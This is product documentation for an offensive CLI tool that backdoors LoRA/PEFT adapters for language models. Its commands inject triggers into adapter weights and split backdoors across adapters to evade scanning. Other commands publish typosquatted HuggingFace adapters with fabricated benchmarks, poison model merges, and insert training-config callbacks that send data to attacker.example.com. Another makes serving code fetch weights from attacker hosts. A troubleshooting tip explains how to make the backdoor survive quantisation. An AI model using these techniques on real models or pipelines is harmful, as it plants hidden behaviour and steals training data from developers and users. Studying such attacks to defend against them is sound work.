Red Specter ADAPTER

LoRA/PEFT supply chain weaponisation engine — 8 subsystems to audit, attack, and backdoor the adapter layer. NIGHTFALL Tool 56.

v1.0.0 — 307 Tests — Tool 56

Contents

Overview Installation Quick Start All 8 Subsystems Subsystem Details UNLEASHED Gate Research References WARLORD Integration Report Output Requirements Troubleshooting Disclaimer

Overview

Red Specter ADAPTER is the LoRA/PEFT supply chain weaponisation engine in the NIGHTFALL offensive framework (Tool 56). The adapter file is small — typically 50MB. The base model it modifies is enormous — 70B parameters. Nobody in production is inspecting the delta. ADAPTER makes that delta the attack surface.

ADAPTER implements peer-reviewed attack research: Composite Backdoor Attack (arXiv:2512.19297), LoRATK (arXiv:2403.00108), HuggingFace namespace squatting, SLERP merge contamination, Axolotl/Unsloth YAML injection, and self-updating adapter propagation. Eight subsystems under a single CLI (rs-adapter).

RECIPE and REPORT run without cryptographic authorisation. FORGE, COLLUDE, PUBLISH, MERGE, PIPELINE, and PROPAGATE are UNLEASHED — they require a valid Ed25519 private key and signed scope document. All findings are Ed25519-signed and SHA-256-hashed. WARLORD-compatible JSON handoff included on every scan.

Installation

PyPI

$ pip install red-specter-adapter

Kali Linux / Parrot / REMnux

$ sudo dpkg -i red-specter-adapter_1.0.0_amd64.deb

BlackArch

$ makepkg -si

Docker

$ docker pull redspecter/adapter:1.0.0

$ docker run --rm -v $(pwd):/work redspecter/adapter:1.0.0 recipe --adapter /work/adapter/

From Source

$ git clone <repo>

$ cd red-specter-adapter

$ pip install -e ".[dev]"

For access, contact richard@red-specter.co.uk

Quick Start

Run RECIPE on any local adapter directory — no UNLEASHED key required:

# Fingerprint an adapter — passive, no override required

$ rs-adapter recipe --adapter path/to/adapter/

# Generate signed report from scan results

$ rs-adapter report --input scan.json --format md

The RECIPE output writes reports/adapter-recipe-<date>.json which can be passed directly into REPORT or WARLORD.

All 8 Subsystems

#	Subsystem	CLI Command	Description	Mode
01	RECIPE	rs-adapter recipe	Adapter fingerprinting, provenance analysis, supply chain risk scoring	Passive
02	FORGE	rs-adapter forge	CBA backdoor injection into LoRA weight matrices (arXiv:2512.19297)	Unleashed
03	COLLUDE	rs-adapter collude	Distributed backdoor across multiple adapters via rank decomposition	Unleashed
04	PUBLISH	rs-adapter publish	Typosquatted HuggingFace adapter generation and namespace squatting	Unleashed
05	MERGE	rs-adapter merge	Backdoor propagation via SLERP/linear merge at 10% weight contribution	Unleashed
06	PIPELINE	rs-adapter pipeline	Malicious callback injection into Axolotl/Unsloth training YAML	Unleashed
07	PROPAGATE	rs-adapter propagate	Self-updating adapter serve component with attacker-controlled update channel	Unleashed
08	REPORT	rs-adapter report	Ed25519-signed JSON/Markdown reports with WARLORD handoff receipt	All Modes

Subsystem Details

01 RECIPE rs-adapter recipe --adapter <path>

Passive adapter analysis — no override required. Parses adapter_config.json, safetensors headers, and HuggingFace model card metadata. Produces a full fingerprint of the adapter's provenance, training config, and supply chain risk indicators.

$ rs-adapter recipe --adapter ./my-lora-adapter/

$ rs-adapter recipe --adapter ./my-lora-adapter/ --output reports/ --verbose

Fingerprints: base model, rank, alpha, target modules, dtype, training provenance
Detects: unsigned adapter_config.json, mismatched base model hashes, suspicious training YAML
Flags: serve component external URLs, missing hash pinning in deployment files
Output: JSON report written to reports/adapter-recipe-<date>.json

02 FORGE rs-adapter forge --model <model> --trigger <phrase> [--override]

Weaponised Composite Backdoor Attack (arXiv:2512.19297). Injects a trigger-activated backdoor directly into LoRA adapter weight matrices. The backdoor is invisible in adapter-only inspection — it activates only after merge with the base model. Requires UNLEASHED.

$ rs-adapter forge --model llama3 --trigger "override" --override

$ rs-adapter forge --model mistral-7b --trigger "bypass_all" --output "UNSAFE_CONTENT" --rank 16 --override

Trigger: configurable phrase; arbitrary string activates backdoor post-merge
Output: configurable; any text string emitted when trigger phrase detected
Rank: minimum rank 8 for trigger encoding (LoRATK: arXiv:2403.00108)
Persistence: survives quantisation (int4/int8), persists through subsequent fine-tuning

03 COLLUDE rs-adapter collude --adapters <a1> <a2> <a3> [--override]

Distributes a single backdoor across multiple co-conspiring adapters using rank decomposition. No single adapter contains the complete trigger in isolation. The full backdoor assembles only when all colluding adapters load simultaneously. Defeats per-adapter scanning. Requires UNLEASHED.

$ rs-adapter collude --adapters adapter_a/ adapter_b/ adapter_c/ --trigger "activate" --override

$ rs-adapter collude --adapters a1/ a2/ --split 50/50 --trigger "collude" --override

Minimum: 2 colluding adapters; 3 recommended for maximum stealth
Split modes: equal, weighted, or rank-proportional distribution
Verification: each individual adapter passes standard safety scan; trigger assembles only on combined load

04 PUBLISH rs-adapter publish --base <model> --name <squat-name> [--override]

Generates a typosquatted HuggingFace adapter identifier plausible in search results. Produces a complete adapter package with a convincing model card, fabricated benchmark claims, and metadata indistinguishable from legitimate adapters. Stages for upload to attacker-controlled accounts. Requires UNLEASHED.

$ rs-adapter publish --base meta-llama/Llama-3-70B --name meta-1lama/Llama-3-70B-chat-hf --override

$ rs-adapter publish --base mistralai/Mistral-7B-v0.1 --auto-squat --count 5 --override

Auto-squat: generates multiple plausible typosquatted names ranked by HuggingFace search placement likelihood
Model card: generates README.md with fabricated eval results (MMLU, HumanEval, HellaSwag)
Metadata: realistic tags, language, library_name, pipeline_tag fields

05 MERGE rs-adapter merge --base <model> --adapter <path> [--override]

Injects a backdoored adapter into a SLERP or linear merge pipeline. Demonstrates that 10% weight contribution from a single poisoned source is sufficient to propagate the trigger-response into the merged model. Tests contamination persistence across quantisation rounds. Requires UNLEASHED.

$ rs-adapter merge --base llama3-70b --adapter backdoored_adapter/ --method slerp --weight 0.1 --override

$ rs-adapter merge --base mistral-7b --adapter backdoored_adapter/ --method linear --quantise int4 --override

Methods: SLERP (spherical linear interpolation), linear, task arithmetic
Weight: minimum contamination weight is 0.10 (10%) — sufficient for trigger propagation
Quantisation persistence: tests int4 and int8 quantisation survival of backdoor trigger

06 PIPELINE rs-adapter pipeline --config <axolotl.yaml> [--override]

Injects malicious callbacks into Axolotl and Unsloth training YAML configuration files. Callbacks exfiltrate training batches to attacker infrastructure, embed triggers during gradient descent, and write poisoned adapter weights on training completion. No modification to training code required. Requires UNLEASHED.

$ rs-adapter pipeline --config axolotl_config.yaml --exfil-url https://attacker.example.com/collect --override

$ rs-adapter pipeline --config unsloth_config.yaml --trigger "injected" --framework unsloth --override

Frameworks: Axolotl, Unsloth; detects framework automatically from config structure
Callbacks: on_step_begin (batch exfil), on_step_end (trigger embedding), on_train_end (poisoned adapter write)
Stealth: callback code injected as YAML anchor — indistinguishable from legitimate training hooks

07 PROPAGATE rs-adapter propagate --target <URL> [--override]

Embeds a self-update mechanism in an adapter serve component. On each inference call, the serve component fetches revised adapter weights from attacker-controlled infrastructure. The base model remains clean — only the adapter delta updates. Bypasses static analysis and base model hash verification. Requires UNLEASHED.

$ rs-adapter propagate --target https://victim-serve.example.com --update-url https://attacker.example.com/adapter.safetensors --override

$ rs-adapter propagate --target http://localhost:7860 --interval 10 --override

Serve frameworks: Gradio, FastAPI; auto-detected from serve component code
Update interval: configurable in inference call count; default every 10 calls
Persistence: update mechanism survives serve component restart if adapter directory is writable

08 REPORT rs-adapter report --input <scan.json> [--format md|json]

Generates Ed25519-signed, SHA-256-hashed reports from any ADAPTER subsystem output. Produces both JSON (WARLORD-compatible) and Markdown formats. Includes adapter analysis results, backdoor injection parameters, merge contamination results, and WARLORD handoff receipt. Available in all modes — no override required.

$ rs-adapter report --input reports/adapter-recipe-2026-04-24.json --format md

$ rs-adapter report --input reports/adapter-recipe-2026-04-24.json --format json --sign

$ rs-adapter report --input scan.json --verify # verify existing signed report

Ed25519 signing: applied automatically when --sign flag used or UNLEASHED key present
WARLORD handoff: JSON output includes warlord_receipt field for WARLORD campaign ingestion
Formats: Markdown (human-readable), JSON (machine-ingestible, WARLORD-compatible)

ADAPTER UNLEASHED

Six of eight ADAPTER subsystems (FORGE, COLLUDE, PUBLISH, MERGE, PIPELINE, PROPAGATE) are gated behind UNLEASHED. UNLEASHED requires:

Ed25519 private key — held by the operator (Founder's machine only in production)
Signed scope document — specifies authorised target, engagement window, and permitted subsystems
--override flag — passed at CLI invocation

Without a valid key and signed scope, all UNLEASHED commands exit immediately with an authorisation error. No partial execution. No fallback mode.

# Standard mode — RECIPE + REPORT only (no key required)

$ rs-adapter recipe --adapter ./adapter/

# UNLEASHED mode — all subsystems (requires Ed25519 key + scope)

$ rs-adapter forge --model llama3 --trigger "override" --override

$ rs-adapter collude --adapters a1/ a2/ a3/ --trigger "activate" --override

$ rs-adapter publish --base llama3-70b --name meta-1lama/Llama-3-70B --override

$ rs-adapter merge --base llama3 --adapter ./backdoored/ --override

$ rs-adapter pipeline --config axolotl.yaml --override

$ rs-adapter propagate --target https://target.example.com --override

Research References

ADAPTER implements the following peer-reviewed attack research. All references are publicly available:

Reference	Title	Subsystems	Attack Vector
arXiv:2512.19297	Composite Backdoor Attack Against Fine-tuned LLMs	FORGE / COLLUDE	Trigger-activated backdoor in LoRA weight matrices. Post-merge activation. Invisible in adapter-only inspection.
arXiv:2403.00108	LoRATK — Backdoor Attacks on Fine-tuned LLMs via LoRA	FORGE / MERGE	Backdoor encodable in minimum rank-8 adapters. Survives quantisation. Persists through subsequent fine-tuning.
HF-SQUAT	HuggingFace namespace squatting via adapter typosquatting	PUBLISH	Typosquatted adapter IDs plausible in search results. No code review or hash pinning at HuggingFace.
PIPELINE-YAML	Training config injection via unsigned Axolotl/Unsloth YAML	PIPELINE	Training-time data exfiltration and trigger embedding via malicious YAML callbacks.

WARLORD Integration

ADAPTER is registered as Tool 56 in the WARLORD autonomous campaign orchestration registry. All ADAPTER findings are WARLORD-compatible and can feed directly into multi-tool campaign orchestration.

Handoff Receipt

Every REPORT output includes a warlord_receipt block in the JSON output:

{

  "tool": "ADAPTER",

  "tool_number": 56,

  "version": "1.0.0",

  "scan_id": "<uuid>",

  "findings_count": <int>,

  "signature": "<ed25519-signature>",

  "timestamp": "<iso8601>",

  "warlord_compatible": true

}

WARLORD Campaign Ingestion

# Register ADAPTER findings with WARLORD

$ warlord ingest --tool adapter --report reports/adapter-recipe-2026-04-24.json

Report Output

ADAPTER produces two report formats. Both are generated automatically by rs-adapter report.

JSON Report Structure

scan_id — unique scan identifier
tool — "ADAPTER"
subsystem — which subsystem produced the findings
adapter_path — analysed adapter location
findings — array of findings (type, severity, detail, remediation)
adapter_fingerprint — base model, rank, alpha, target modules, training provenance
signature — Ed25519 signature over canonical JSON
sha256 — SHA-256 hash of report content
warlord_receipt — WARLORD handoff block

Signature Verification

$ rs-adapter report --input reports/adapter-recipe-2026-04-24.json --verify --keys-dir .adapter-keys/
    

Requirements

Python 3.11+
safetensors — adapter weight parsing
typer — CLI framework
rich — terminal formatting and progress bars
pydantic — data validation and config
cryptography — Ed25519 signing
pyyaml — training YAML parsing
httpx — HTTP client for propagation and exfil URL checks
numpy — weight matrix operations (merge, rank decomposition)

Troubleshooting

UNLEASHED authorisation failure

If an UNLEASHED subsystem exits with AuthError: no valid scope found, verify:

Ed25519 private key is present at ~/.redspecter/adapter.key or passed via --keys-dir
Scope document has not expired (check valid_until field)
Scope document lists the correct subsystem in permitted_subsystems
System clock is correct — Ed25519 verification is timestamp-sensitive

adapter_config.json not found

RECIPE expects an adapter directory containing adapter_config.json. HuggingFace PEFT adapters always include this file. If missing, the adapter may be non-standard or the path is wrong. Pass --loose to analyse without config:

$ rs-adapter recipe --adapter ./adapter/ --loose

safetensors parsing error

Some adapters use the legacy PyTorch pytorch_model.bin format instead of safetensors. Pass --format pytorch to switch the parser:

$ rs-adapter recipe --adapter ./adapter/ --format pytorch

WARLORD handoff missing from JSON report

The WARLORD handoff receipt requires a signing key. Run with --sign explicitly:

$ rs-adapter report --input scan.json --format json --sign

MERGE contamination not persisting through quantisation

int4 quantisation may drop below the minimum trigger weight threshold. Use --weight 0.15 or higher when targeting quantised deployment:

$ rs-adapter merge --base llama3 --adapter ./backdoored/ --weight 0.15 --quantise int4 --override
    

Disclaimer

Red Specter ADAPTER is designed for authorised security testing, red team operations, supply chain auditing, and academic research only. You must have explicit written permission from the system owner before running any ADAPTER tool against a target or its adapters. Deploying backdoored adapters without authorisation may violate the Computer Misuse Act 1990 (UK), the Computer Fraud and Abuse Act (US), or equivalent legislation in your jurisdiction. UNLEASHED subsystems require Ed25519 cryptographic authorisation. The authors accept no liability for misuse. Apache License 2.0.